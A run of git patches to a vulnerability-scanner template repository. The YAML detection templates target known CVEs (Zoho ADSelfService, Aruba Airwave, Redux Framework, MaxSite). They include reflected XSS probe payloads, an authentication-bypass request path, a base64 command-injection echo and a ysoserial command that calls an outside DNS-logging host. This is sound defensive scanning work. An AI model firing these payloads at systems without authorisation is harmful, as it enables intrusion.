a/technologies/gitea-detect.yaml +++ b/technologies/gitea-detect.yaml @@ -12,6 +12,7 @@ requests: - "{{BaseURL}}" - "{{BaseURL}}/user/login" + stop-at-first-match: true matchers-condition: and matchers: @@ -23,3 +24,9 @@ requests: - type: status status: - 200 + + extractors: + - type: regex + part: body + regex: + - "Powered by Gitea Version: ([0-9.]+)" From 55d676dc77d54b41ffe21446c8769ff7fedb3dbb Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 18:18:51 +0530 Subject: [PATCH 2320/4083] Update CVE-2021-40539.yaml --- cves/2021/CVE-2021-40539.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-40539.yaml b/cves/2021/CVE-2021-40539.yaml index 99127daa41..d90c9cb621 100644 --- a/cves/2021/CVE-2021-40539.yaml +++ b/cves/2021/CVE-2021-40539.yaml @@ -5,16 +5,16 @@ info: author: daffainfo severity: critical description: Zoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution. - tags: cve,cve2021,rce,zoho reference: - https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539 + tags: cve,cve2021,rce,zoho requests: - raw: - | - POST /RestAPI/LogonCustomization HTTP/1.1 + POST /./RestAPI/LogonCustomization HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Content-Length: 27 From cd98f1dcc7e317477fd3796fd4dd5a430eb0687e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 18:19:49 +0530 Subject: [PATCH 2321/4083] Update CVE-2016-8527.yaml --- cves/2016/CVE-2016-8527.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2016/CVE-2016-8527.yaml b/cves/2016/CVE-2016-8527.yaml index 2e88470258..828f85d642 100644 --- a/cves/2016/CVE-2016-8527.yaml +++ b/cves/2016/CVE-2016-8527.yaml @@ -4,7 +4,7 @@ info: name: Aruba Airwave - (XSS) author: pikpikcu severity: medium - description: Aruba Airwave all versions up to, but not including, 8.2.3.1 is vulnerable to a reflected cross-site scripting (XSS). + description: Aruba Airwave all versions up to, but not including, 8.2.3.1 is vulnerable to a reflected cross-site scripting (XSS). reference: - https://www.exploit-db.com/exploits/41482 - https://nvd.nist.gov/vuln/detail/CVE-2016-8527 From d0f5daca610eea29a9171330170186838ee2c8d3 Mon Sep 17 00:00:00 2001 From: forgedhallpass <13679401+forgedhallpass@users.noreply.github.com> Date: Thu, 16 Sep 2021 16:04:04 +0300 Subject: [PATCH 2322/4083] #276 Replace space character with dash in template ID. --- cves/2020/CVE-2020-6171.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-6171.yaml b/cves/2020/CVE-2020-6171.yaml index 1e99f11860..aa04aa85bd 100644 --- a/cves/2020/CVE-2020-6171.yaml +++ b/cves/2020/CVE-2020-6171.yaml @@ -1,4 +1,4 @@ -id: CVE 2020-6171 +id: CVE-2020-6171 info: name: CLink Office v2 XSS From 7542ad2c07f4fe6f47c66eb951cfa577ad193982 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 16 Sep 2021 13:05:34 +0000 Subject: [PATCH 2323/4083] Auto Generated CVE annotations [Thu Sep 16 13:05:34 UTC 2021] :robot: --- cves/2020/CVE-2020-6171.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2020/CVE-2020-6171.yaml b/cves/2020/CVE-2020-6171.yaml index aa04aa85bd..2e680f0de1 100644 --- a/cves/2020/CVE-2020-6171.yaml +++ b/cves/2020/CVE-2020-6171.yaml @@ -8,6 +8,11 @@ info: A cross-site scripting (XSS) vulnerability in the index page of the CLink Office 2.0 management console allows remote attackers to inject arbitrary web script or HTML via the lang parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2020-6171 tags: cve,cve2020,xss,clink-office + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-6171 + cwe-id: CWE-79 requests: - method: GET From 8cee3ae73bb3b752c96a42bf329842320efc41f7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 18:42:19 +0530 Subject: [PATCH 2324/4083] Update CVE-2016-8527.yaml --- cves/2016/CVE-2016-8527.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2016/CVE-2016-8527.yaml b/cves/2016/CVE-2016-8527.yaml index 828f85d642..94470343ec 100644 --- a/cves/2016/CVE-2016-8527.yaml +++ b/cves/2016/CVE-2016-8527.yaml @@ -13,14 +13,14 @@ info: requests: - method: GET path: - - "{{BaseURL}}/visualrf/group_list.xml?aps=1&start=%3ca%20xmlns%3aa%3d'http%3a%2f%2fwww.w3.org%2f1999%2fxhtml'%3e%3ca%3abody%20onload%3d'alert(document.domain)'%2f%3e%3c%2fa%3e&end=500&match" + - "{{BaseURL}}/visualrf/group_list.xml?aps=1&start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&end=500&match" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: status @@ -28,6 +28,6 @@ requests: - 200 - type: word - words: - - 'Content-Type: text/html' part: header + words: + - text/html From 77c3dc36ac7df4c04e3ff7cd97f5f63ec8dc7311 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 16 Sep 2021 13:13:57 +0000 Subject: [PATCH 2325/4083] Auto Generated CVE annotations [Thu Sep 16 13:13:57 UTC 2021] :robot: --- cves/2021/CVE-2021-40539.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2021/CVE-2021-40539.yaml b/cves/2021/CVE-2021-40539.yaml index d90c9cb621..0da6945312 100644 --- a/cves/2021/CVE-2021-40539.yaml +++ b/cves/2021/CVE-2021-40539.yaml @@ -9,6 +9,11 @@ info: - https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539 tags: cve,cve2021,rce,zoho + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-40539 + cwe-id: CWE-287 requests: From d8776d389f8b59ecc261957b4acb8355bc0975aa Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 18:49:01 +0530 Subject: [PATCH 2326/4083] Update php-proxy-detect.yaml --- technologies/php-proxy-detect.yaml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/technologies/php-proxy-detect.yaml b/technologies/php-proxy-detect.yaml index bd3e98a6fd..fb898af353 100644 --- a/technologies/php-proxy-detect.yaml +++ b/technologies/php-proxy-detect.yaml @@ -23,3 +23,10 @@ requests: - type: status status: - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'PHP\-Proxy<\/a> ([0-9.]+)<\/div>' From 18ab41c89a71719a5e566966b00a46a49a0e7a23 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 16 Sep 2021 13:20:40 +0000 Subject: [PATCH 2327/4083] Auto Generated CVE annotations [Thu Sep 16 13:20:40 UTC 2021] :robot: --- cves/2016/CVE-2016-8527.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2016/CVE-2016-8527.yaml b/cves/2016/CVE-2016-8527.yaml index 94470343ec..efc62d3bd6 100644 --- a/cves/2016/CVE-2016-8527.yaml +++ b/cves/2016/CVE-2016-8527.yaml @@ -9,6 +9,11 @@ info: - https://www.exploit-db.com/exploits/41482 - https://nvd.nist.gov/vuln/detail/CVE-2016-8527 tags: cves,cve2016,aruba,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-8527 + cwe-id: CWE-79 requests: - method: GET From ea4b5a5c81337001124dd73af59caeee26842483 Mon Sep 17 00:00:00 2001 From: meme-lord <17912559+meme-lord@users.noreply.github.com> Date: Thu, 16 Sep 2021 15:08:12 +0100 Subject: [PATCH 2328/4083] Added Redux Framework 2021 CVE --- cves/2021/CVE-2021-38314.yml | 50 ++++++++++++++++++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 cves/2021/CVE-2021-38314.yml diff --git a/cves/2021/CVE-2021-38314.yml b/cves/2021/CVE-2021-38314.yml new file mode 100644 index 0000000000..57961e07cd --- /dev/null +++ b/cves/2021/CVE-2021-38314.yml @@ -0,0 +1,50 @@ +id: redux-framework-plugin +info: + name: Redux Framework Plugin + author: meme-lord + severity: medium + reference: | + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38314 + - https://www.wordfence.com/blog/2021/09/over-1-million-sites-affected-by-redux-framework-vulnerabilities/ + tags: cve,cve2021,wordpress + + +requests: + - raw: + - | + GET /wp-admin/admin-ajax.php?action={{md5(replace('http://HOST/-redux','HOST',Hostname))}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept: */* + Connection: close + + - | + GET /wp-admin/admin-ajax.php?action={{md5(replace('https://HOST/-redux','HOST',Hostname))}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept: */* + Connection: close + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - "len(body)<50" + + - type: regex + name: meme + regex: + - '[a-f0-9]{32}' + part: body + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + regex: + - "[a-f0-9]{32}" From 676b51d20c2db63788ad091013b9cf554d91a475 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 16 Sep 2021 21:24:33 +0530 Subject: [PATCH 2329/4083] Metadata attribute update --- cves/2019/CVE-2019-1010287.yaml | 8 ++++---- cves/2019/CVE-2019-12593.yaml | 4 ++-- cves/2020/CVE-2020-13167.yaml | 4 ++-- cves/2020/CVE-2020-14864.yaml | 2 -- cves/2021/CVE-2021-26295.yaml | 2 +- default-logins/abb/cs141-default-login.yaml | 2 +- dns/elasticbeantalk-takeover.yaml | 2 +- technologies/abyss-web-server.yaml | 2 +- technologies/iplanet-web-server.yaml | 2 +- .../kubernetes/kubernetes-enterprise-manager.yaml | 2 +- technologies/kubernetes/kubernetes-mirantis.yaml | 2 +- technologies/oracle/oracle-iplanet-web-server.yaml | 2 +- vulnerabilities/generic/top-xss-params.yaml | 2 +- vulnerabilities/other/bullwark-momentum-lfi.yaml | 2 +- vulnerabilities/other/sick-beard-xss.yaml | 2 +- 15 files changed, 19 insertions(+), 21 deletions(-) diff --git a/cves/2019/CVE-2019-1010287.yaml b/cves/2019/CVE-2019-1010287.yaml index 93c87f6f1b..02fb5c9607 100644 --- a/cves/2019/CVE-2019-1010287.yaml +++ b/cves/2019/CVE-2019-1010287.yaml @@ -4,21 +4,21 @@ info: name: Timesheet 1.5.3 - Cross Site Scripting author: pikpikcu severity: medium + description: "Timesheet Next Gen 1.5.3 and earlier is affected by: Cross Site Scripting (XSS). The impact is: Allows an attacker to execute arbitrary HTML and JavaScript code via a \"redirect\" parameter. The component is: Web login form: login.php, lines 40 and 54. The attack vector is: reflected XSS, victim may click the malicious url." reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-1010287 - http://www.mdh-tz.info/ # demo tags: cve,cve2019,timesheet,xss - additional-fields: - google-dork: inurl:"/timesheet/login.php" classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 cve-id: CVE-2019-1010287 cwe-id: CWE-79 - description: "Timesheet Next Gen 1.5.3 and earlier is affected by: Cross Site Scripting (XSS). The impact is: Allows an attacker to execute arbitrary HTML and JavaScript code via a \"redirect\" parameter. The component is: Web login form: login.php, lines 40 and 54. The attack vector is: reflected XSS, victim may click the malicious url." + metadata: + google-dork: inurl:"/timesheet/login.php" requests: - - raw: # Metod POST From login.php + - raw: - | POST /timesheet/login.php HTTP/1.1 Host: {{Hostname}} diff --git a/cves/2019/CVE-2019-12593.yaml b/cves/2019/CVE-2019-12593.yaml index 2c649f6e12..d0cadf98c8 100644 --- a/cves/2019/CVE-2019-12593.yaml +++ b/cves/2019/CVE-2019-12593.yaml @@ -11,13 +11,13 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2019-12593 - http://www.icewarp.com # vendor homepage - https://www.icewarp.com/downloads/trial/ # software link - additional-fields: - google-dork: Powered By IceWarp 10.4.4 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.50 cve-id: CVE-2019-12593 cwe-id: CWE-22 + metadata: + google-dork: Powered By IceWarp 10.4.4 requests: - method: GET diff --git a/cves/2020/CVE-2020-13167.yaml b/cves/2020/CVE-2020-13167.yaml index be49883637..789f25b5ee 100644 --- a/cves/2020/CVE-2020-13167.yaml +++ b/cves/2020/CVE-2020-13167.yaml @@ -9,13 +9,13 @@ info: reference: - https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/ - https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says - additional-fields: - hex-payload: 'echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out' classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2020-13167 cwe-id: CWE-78 + metadata: + hex-payload: 'echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out' requests: - method: GET diff --git a/cves/2020/CVE-2020-14864.yaml b/cves/2020/CVE-2020-14864.yaml index f46615666a..e2e0206f06 100644 --- a/cves/2020/CVE-2020-14864.yaml +++ b/cves/2020/CVE-2020-14864.yaml @@ -8,8 +8,6 @@ info: reference: - http://packetstormsecurity.com/files/159748/Oracle-Business-Intelligence-Enterprise-Edition-5.5.0.0.0-12.2.1.3.0-12.2.1.4.0-LFI.html - https://www.oracle.com/security-alerts/cpuoct2020.html - additional-fields: - cvss: 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N' classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.50 diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index fa1a549e53..b973c0720d 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -14,7 +14,7 @@ info: cvss-score: 9.80 cve-id: CVE-2021-26295 cwe-id: CWE-502 - additional-fields: + metadata: ysoserial-payload: 'java -jar ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn | hex' requests: diff --git a/default-logins/abb/cs141-default-login.yaml b/default-logins/abb/cs141-default-login.yaml index 6852d161cb..60bdbd942f 100644 --- a/default-logins/abb/cs141-default-login.yaml +++ b/default-logins/abb/cs141-default-login.yaml @@ -6,7 +6,7 @@ info: severity: medium reference: https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf tags: hiawatha,iot,default-login - additional-fields: + metadata: shodan-dork: https://www.shodan.io/search?query=html%3A%22CS141%22 requests: diff --git a/dns/elasticbeantalk-takeover.yaml b/dns/elasticbeantalk-takeover.yaml index 8a06147859..d8b6ddfc4f 100644 --- a/dns/elasticbeantalk-takeover.yaml +++ b/dns/elasticbeantalk-takeover.yaml @@ -9,7 +9,7 @@ info: - https://twitter.com/payloadartist/status/1362035009863880711 - https://www.youtube.com/watch?v=srKIqhj_ki8 tags: dns,takeover,aws - additional-fields: + metadata: comments: | Only CNAMEs with region specification are hijackable. You need to claim the CNAME in AWS portal (https://aws.amazon.com/) or via AWS CLI to confirm the takeover. diff --git a/technologies/abyss-web-server.yaml b/technologies/abyss-web-server.yaml index a760447d4b..21b392d066 100644 --- a/technologies/abyss-web-server.yaml +++ b/technologies/abyss-web-server.yaml @@ -5,7 +5,7 @@ info: author: pussycat0x severity: info tags: tech - additional-fields: + metadata: fofa-dork: 'app="Abyss-Web-Server"' requests: diff --git a/technologies/iplanet-web-server.yaml b/technologies/iplanet-web-server.yaml index 1b3b79c375..bd470068d7 100644 --- a/technologies/iplanet-web-server.yaml +++ b/technologies/iplanet-web-server.yaml @@ -5,7 +5,7 @@ info: author: pussycat0x severity: info tags: tech - additional-fields: + metadata: fofa-dork: 'app="iPlanet-Web-Server,-Enterprise-Edition-4.1"' requests: diff --git a/technologies/kubernetes/kubernetes-enterprise-manager.yaml b/technologies/kubernetes/kubernetes-enterprise-manager.yaml index 137e4062a7..57a51341a8 100644 --- a/technologies/kubernetes/kubernetes-enterprise-manager.yaml +++ b/technologies/kubernetes/kubernetes-enterprise-manager.yaml @@ -5,7 +5,7 @@ info: author: pussycat0x severity: info tags: tech,kubernetes - additional-fields: + metadata: fofa-dork: 'app="Kubernetes-Enterprise-Manager"' requests: diff --git a/technologies/kubernetes/kubernetes-mirantis.yaml b/technologies/kubernetes/kubernetes-mirantis.yaml index f823c86fb8..b6cdbff813 100644 --- a/technologies/kubernetes/kubernetes-mirantis.yaml +++ b/technologies/kubernetes/kubernetes-mirantis.yaml @@ -5,7 +5,7 @@ info: author: pussycat0x severity: info tags: tech,kubernetes - additional-fields: + metadata: fofa-dork: 'app="Mirantis-Kubernetes-Engine"' requests: diff --git a/technologies/oracle/oracle-iplanet-web-server.yaml b/technologies/oracle/oracle-iplanet-web-server.yaml index adea754704..07d74c7cac 100644 --- a/technologies/oracle/oracle-iplanet-web-server.yaml +++ b/technologies/oracle/oracle-iplanet-web-server.yaml @@ -5,7 +5,7 @@ info: author: pussycat0x severity: info tags: tech,oracle - additional-fields: + metadata: fofa-dork: 'app="Oracle-iPlanet-Web-Server' requests: diff --git a/vulnerabilities/generic/top-xss-params.yaml b/vulnerabilities/generic/top-xss-params.yaml index d243903673..bcee1a4694 100644 --- a/vulnerabilities/generic/top-xss-params.yaml +++ b/vulnerabilities/generic/top-xss-params.yaml @@ -6,7 +6,7 @@ info: severity: medium description: Searches for reflected XSS in the server response via GET-requests. tags: xss,generic - additional-fields: + metadata: parameters: q,s,search,id,action,keyword,query,page,keywords,url,view,cat,name,key,p requests: diff --git a/vulnerabilities/other/bullwark-momentum-lfi.yaml b/vulnerabilities/other/bullwark-momentum-lfi.yaml index a6424a4b88..abe45ac827 100644 --- a/vulnerabilities/other/bullwark-momentum-lfi.yaml +++ b/vulnerabilities/other/bullwark-momentum-lfi.yaml @@ -8,7 +8,7 @@ info: - https://www.exploit-db.com/exploits/47773 - http://www.bullwark.net/ # vendor homepage - http://www.bullwark.net/Kategoriler.aspx?KategoriID=24 # software link - additional-fields: + metadata: version: Bullwark Momentum Series Web Server JAWS/1.0 shodan-dork: https://www.shodan.io/search?query=Bullwark&page=1 fofa-dork: https://fofa.so/result?q=Bullwark&qbase64=QnVsbHdhcms%3D diff --git a/vulnerabilities/other/sick-beard-xss.yaml b/vulnerabilities/other/sick-beard-xss.yaml index 51b5a3253c..564e9bb618 100644 --- a/vulnerabilities/other/sick-beard-xss.yaml +++ b/vulnerabilities/other/sick-beard-xss.yaml @@ -8,7 +8,7 @@ info: reference: - https://sickbeard.com/ # vendor homepage - https://github.com/midgetspy/Sick-Beard # software link - additional-fields: + metadata: shodan-dork: sickbeard requests: From 4984b42e66b2c51d1ea89bffad47360d42e55910 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 21:28:19 +0530 Subject: [PATCH 2330/4083] Update CVE-2019-7543.yaml --- cves/2019/CVE-2019-7543.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2019/CVE-2019-7543.yaml b/cves/2019/CVE-2019-7543.yaml index a3c1d32ec5..e9ce1b1915 100644 --- a/cves/2019/CVE-2019-7543.yaml +++ b/cves/2019/CVE-2019-7543.yaml @@ -13,18 +13,18 @@ info: requests: - method: POST path: - - '{{BaseURL}/kindeditor/php/demo.php' + - '{{BaseURL}}/kindeditor/php/demo.php' + - '{{BaseURL}}/php/demo.php' + body: "content1=&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9" headers: Content-Type: application/x-www-form-urlencoded - body: "content1=&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9" - matchers-condition: and matchers: - type: word words: - - '' + - '' part: body - type: word From 4926c9174cc397130c4ded51f416eec8220a75d9 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 16 Sep 2021 21:43:58 +0530 Subject: [PATCH 2331/4083] misc update --- technologies/getsimple-cms-detect.yaml | 7 ++++++- technologies/getsimple-cms-detector.yaml | 22 ---------------------- 2 files changed, 6 insertions(+), 23 deletions(-) delete mode 100644 technologies/getsimple-cms-detector.yaml diff --git a/technologies/getsimple-cms-detect.yaml b/technologies/getsimple-cms-detect.yaml index 931a074037..9f6dab6f06 100644 --- a/technologies/getsimple-cms-detect.yaml +++ b/technologies/getsimple-cms-detect.yaml @@ -2,15 +2,18 @@ id: getsimple-cms-detect info: name: GetSimple CMS Detection - author: pikpikcu + author: pikpikcu,philippedelteil severity: info tags: tech,getsimple + description: Template to detect a running GetSimple CMS instance requests: - method: GET path: - "{{BaseURL}}" + - "{{BaseURL}}/readme.txt" + stop-at-first-match: true matchers-condition: and matchers: - type: status @@ -20,4 +23,6 @@ requests: - type: word words: - "Powered by GetSimple" + - 'GetSimple CMS is a flatfile CMS' part: body + condition: or \ No newline at end of file diff --git a/technologies/getsimple-cms-detector.yaml b/technologies/getsimple-cms-detector.yaml deleted file mode 100644 index 95ed07e8c1..0000000000 --- a/technologies/getsimple-cms-detector.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: getsimple-cms-detector - -info: - name: GetSimple CMS Detector - author: philippedelteil - severity: info - description: With this template we can detect a running GetSimple CMS instance - tags: getsimple,tech -requests: - - method: GET - path: - - "{{BaseURL}}/readme.txt" - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'GetSimple CMS is a flatfile CMS' - - type: status - part: header - status: - - 200 From 32d0a0d99d16fd0428fe780149622d458be6a048 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Thu, 16 Sep 2021 21:56:49 +0530 Subject: [PATCH 2332/4083] Update CVE-2021-38314.yml --- cves/2021/CVE-2021-38314.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/cves/2021/CVE-2021-38314.yml b/cves/2021/CVE-2021-38314.yml index 57961e07cd..eb409486a3 100644 --- a/cves/2021/CVE-2021-38314.yml +++ b/cves/2021/CVE-2021-38314.yml @@ -7,7 +7,6 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38314 - https://www.wordfence.com/blog/2021/09/over-1-million-sites-affected-by-redux-framework-vulnerabilities/ tags: cve,cve2021,wordpress - requests: - raw: From 77a468e9c7da36aa21cf8044891d586c37c9409f Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Thu, 16 Sep 2021 21:59:41 +0530 Subject: [PATCH 2333/4083] Update and rename CVE-2021-38314.yml to CVE-2021-38314.yaml --- cves/2021/{CVE-2021-38314.yml => CVE-2021-38314.yaml} | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) rename cves/2021/{CVE-2021-38314.yml => CVE-2021-38314.yaml} (92%) diff --git a/cves/2021/CVE-2021-38314.yml b/cves/2021/CVE-2021-38314.yaml similarity index 92% rename from cves/2021/CVE-2021-38314.yml rename to cves/2021/CVE-2021-38314.yaml index eb409486a3..48326d830e 100644 --- a/cves/2021/CVE-2021-38314.yml +++ b/cves/2021/CVE-2021-38314.yaml @@ -1,6 +1,7 @@ -id: redux-framework-plugin +id: CVE-2021-38314 + info: - name: Redux Framework Plugin + name: Redux Framework - Unauthenticated Sensitive Information Disclosure author: meme-lord severity: medium reference: | From 0dd6d4a6b414a1f98f0f76a88c0268bdd2032223 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 16 Sep 2021 16:58:29 +0000 Subject: [PATCH 2334/4083] Auto Generated CVE annotations [Thu Sep 16 16:58:29 UTC 2021] :robot: --- cves/2019/CVE-2019-13392.yaml | 5 +++++ cves/2019/CVE-2019-7543.yaml | 5 +++++ 2 files changed, 10 insertions(+) diff --git a/cves/2019/CVE-2019-13392.yaml b/cves/2019/CVE-2019-13392.yaml index fe641a6446..2bc429135d 100644 --- a/cves/2019/CVE-2019-13392.yaml +++ b/cves/2019/CVE-2019-13392.yaml @@ -9,6 +9,11 @@ info: - https://www.doyler.net/security-not-included/natemail-vulnerabilities - https://nvd.nist.gov/vuln/detail/CVE-2019-13392 tags: cves,cve2019,natemail,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-13392 + cwe-id: CWE-79 requests: - raw: diff --git a/cves/2019/CVE-2019-7543.yaml b/cves/2019/CVE-2019-7543.yaml index e9ce1b1915..4ce8628577 100644 --- a/cves/2019/CVE-2019-7543.yaml +++ b/cves/2019/CVE-2019-7543.yaml @@ -9,6 +9,11 @@ info: - https://github.com/0xUhaw/CVE-Bins/tree/master/KindEditor - https://nvd.nist.gov/vuln/detail/CVE-2019-7543 tags: cves,cve2019,kindeditor,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-7543 + cwe-id: CWE-79 requests: - method: POST From d3c6985d3ebf87fc40c4173797c76c4040cff79c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 22:31:41 +0530 Subject: [PATCH 2335/4083] Update CVE-2021-35265.yaml --- cves/2021/CVE-2021-35265.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/cves/2021/CVE-2021-35265.yaml b/cves/2021/CVE-2021-35265.yaml index bbdb198b8a..a90ef3066c 100644 --- a/cves/2021/CVE-2021-35265.yaml +++ b/cves/2021/CVE-2021-35265.yaml @@ -4,7 +4,7 @@ info: name: MaxSite CMS XSS author: pikpikcu severity: medium - description: reflected cross-site scripting (XSS) vulnerability in MaxSite CMS before V106 via product/page/* allows remote attackers to inject arbitrary web script to a page. + description: Reflected cross-site scripting (XSS) vulnerability in MaxSite CMS before V106 via product/page/* allows remote attackers to inject arbitrary web script to a page. reference: - https://github.com/maxsite/cms/issues/414#issue-726249183 - https://nvd.nist.gov/vuln/detail/CVE-2021-35265 @@ -13,21 +13,21 @@ info: requests: - method: GET path: - - '{{BaseURL}}/page/hello/1%22%3E%3Csvg/onload=alert(document.domain)%3E' - - '{{BaseURL}}/maxsite/page/hello/1%22%3E%3Csvg/onload=alert(document.domain)%3E' + - '{{BaseURL}}/page/1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + - '{{BaseURL}}/maxsite/page/1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - '">' + - '' part: body - type: word - words: - - 'Content-Type: text/html' part: header + words: + - text/html - type: status status: From c40be75a1395186198349f608063d5bf4ba5226d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 16 Sep 2021 17:04:58 +0000 Subject: [PATCH 2336/4083] Auto Generated CVE annotations [Thu Sep 16 17:04:58 UTC 2021] :robot: --- cves/2021/CVE-2021-35265.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2021/CVE-2021-35265.yaml b/cves/2021/CVE-2021-35265.yaml index a90ef3066c..5217c1c155 100644 --- a/cves/2021/CVE-2021-35265.yaml +++ b/cves/2021/CVE-2021-35265.yaml @@ -9,6 +9,11 @@ info: - https://github.com/maxsite/cms/issues/414#issue-726249183 - https://nvd.nist.gov/vuln/detail/CVE-2021-35265 tags: cves,cve2021,maxsite,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-35265 + cwe-id: CWE-79 requests: - method: GET From d0df2974fd009254c7a2248b231e21e32edf4bc1 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 22:42:22 +0530 Subject: [PATCH 2337/4083] Update CVE-2021-24499.yaml --- cves/2021/CVE-2021-24499.yaml | 15 ++++++--------- 1 file changed, 6 insertions(+), 9 deletions(-) diff --git a/cves/2021/CVE-2021-24499.yaml b/cves/2021/CVE-2021-24499.yaml index 0e7316599c..b38bdac6ae 100644 --- a/cves/2021/CVE-2021-24499.yaml +++ b/cves/2021/CVE-2021-24499.yaml @@ -5,8 +5,10 @@ info: author: daffainfo severity: critical description: The AJAX actions workreap_award_temp_file_uploader and workreap_temp_file_uploader did not perform nonce checks, or validate that the request is from a valid user in any other way. The endpoints allowed for uploading arbitrary files to the uploads/workreap-temp directory. Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as php scripts. - reference: https://github.com/RyouYoo/CVE-2021-24499 - tags: cve,cve2021,wordpress,wp-plugin,rce + reference: + - https://github.com/RyouYoo/CVE-2021-24499 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24499 + tags: 